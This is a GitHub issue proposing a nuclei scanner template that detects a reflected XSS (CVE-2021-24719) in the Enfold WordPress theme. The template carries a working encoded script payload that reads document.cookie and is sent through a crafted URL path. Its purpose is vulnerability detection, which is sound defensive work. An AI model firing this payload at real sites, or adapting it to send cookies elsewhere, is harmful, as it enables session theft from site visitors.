### ISSUE TITLE
Enfold Theme < 4.8.4 - Reflected Cross-Site Scripting (XSS)

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4646]
```yaml
id: CVE-2021-24719

info:
  name: Enfold Theme < 4.8.4 - Reflected Cross-Site Scripting (XSS)
  author: Akincibor
  severity: medium
  description: The Enfold theme was vulnerable to Reflected Cross-Site Scripting (XSS). The vulnerability is present on Enfold versions previous than 4.8.4 which use Avia Page Builder.
  reference:
    - https://wpscan.com/vulnerability/a53e213f-6011-47f8-93e6-aa5ad30e857e
  tags: xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/paginated-entry/?%2527%253E%253Cscript%253Eeval%2528atob%2528%2522Y29uc29sZS5sb2coZG9jdW1lbnQuY29va2llKQ%253D%253D%2522%2529%2529%253C%252Fscript%253E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '><script>eval(atob("Y29uc29sZS5sb2coZG9jdW1lbnQuY29va2llKQ=="))</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
